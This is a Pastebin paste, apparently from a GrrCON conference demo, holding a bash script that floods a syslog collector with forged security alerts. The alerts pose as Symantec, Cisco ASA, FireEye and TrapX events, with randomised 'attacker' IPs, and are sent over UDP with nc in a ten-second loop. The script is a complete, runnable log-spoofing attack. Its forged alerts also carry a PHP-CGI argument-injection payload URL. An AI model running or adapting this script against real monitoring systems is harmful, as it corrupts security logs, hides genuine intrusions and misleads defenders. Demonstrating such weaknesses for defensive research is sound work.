SHARE
TWEET

Syslog Spoof - GrrCON Demo - Charles Herring

a guest Oct 24th, 2019 236 Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. #!/bin/bash
  2. timestamp_short=$(date -d '8 hours ago' +"%b %d %T")
  3. timestamp_medium=$(date -d '8 hours ago' +"%b %d %Y %T")
  4. timestamp_long=$(date -d '8 hours ago' +"%B %d %Y %T")
  5. streamerip=172.31.4.37
  6. printf "Spoofing messages as fast as possible for 10 seconds .\n"
  7. COUNTER=0
  8. end=$((SECONDS+10))
  9. LIES=0
  10. while [ $SECONDS -lt $end ]; do
  11.     attacker="10.$(( ( RANDOM % 254 )  + 1 )).$(( ( RANDOM % 254 )  + 1 )).$(( ( RANDOM % 254 )  + 1 ))"
  12.     echo -n "<50>${timestamp_short} acmesep SymantecServer: ACMELAPTOP143,[SID: 26825] Web Attack: Plesk Command Injection attack blocked. Traffic has been blocked for this application: C:\PROGRAM FILES (X86)\SKYPE\PHONE\SKYPE.EXE,Local: ${attacker},Local: 000000000000,Remote: ,Remote: 192.168.1.5,Remote: 000000000000,Inbound,TCP,Intrusion ID: 0,Begin: 2018-01-09 11:31:27,End: 2018-01-09 11:31:27,Occurrences: 1,Application: C:/PROGRAM FILES (X86)/SKYPE/PHONE/SKYPE.EXE,Location: Default,User: jdoe,Domain: ADLOCAL,Local Port 80,Remote Port 53590,CIDS Signature ID: 26825,CIDS Signature string: Web Attack: Plesk Command Injection,CIDS Signature SubID: 72137,Intrusion URL: localhost/phppath/php?-d+allow_url_include=on+-d+safe_mode=off+-d+suhosin.simulation=on+-d+disable_functions=%22%22+-d+max_execution_time=0+-d+open_basedir=none+-d+auto_prepend_file=php://input+-d+cgi.force_redirect=0+-d+cgi.redirect_status_env=0+-n,Intrusion Payload URL:" | nc -u -w 0 "${streamerip}" 514
  13.     echo -n "<162>${timestamp_medium}: %ASA-2-106006: Deny inbound UDP from ${attacker}/15407 to 192.168.1.5/5060 on interface outside" | nc -u -w 0 "${streamerip}" 514
  14.     echo -n "<161>fenotify-2587809.alert: CEF:0|FireEye|eMPS|8.0.2.682549|MO|malware-object|4|rt=${timestamp_short} UTC cn2Label=sid cn2=88970333 request=hxxps://capitanes.org.ar/document.htm act=notified dvchost=COSFireEyeEX.acme.com cs4Label=link cs4=https://192.168.1.5/emps/eanalysis?e_id\=5412033&type\=url&lms_iden\=0C:C4:7A:DA:FB:D6 duser=jdoe@acme.com cn1Label=vlan cn1=0 externalId=2587809 dvc=${attacker} suser=badguy@evil.com msg=DM2PR11MB0335C8A2D6B4EDF150793468D9100@evil.prod.outlook.com cs1Label=sname cs1=Phish.LIVE.DTI.URL start=Jan 09 2018 15:59:22 UTC cat=retro-detection devicePayloadId=2e8dd72f-97a8-4863-baab-805ead82feee fileType=exe flexString2Label=subject flexString2=[EXTERNAL] Invoices for approval" | nc -u -w 0 "${streamerip}" 514
  15.     echo -n "<81>${timestamp_long} 127.0.1.1 CEF:0|TrapX|TSOC|6.0|ID:3|Intelligence Event - Network Scan Detected|4|rt=${timestamp_short} src=${attacker} deviceNtDomain=AcmedTrapxApp001_NIS dpt=256 cs5Label=company cs5=N.America proto=TCP deviceExternalId=279 dst=192.168.1.5 spt=45774 cat=Network Scan Detected devicePayloadId=NO externalId=11671827" | nc -u -w 0 "${streamerip}" 514
  16.     COUNTER=$((COUNTER + 4))
  17.     LIES=$((LIES + 1))
  18. done
  19. printf "$COUNTER spoofed messages sent concerning $LIES spoofed IP \n"
RAW Paste Data
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy. OK, I Understand
Top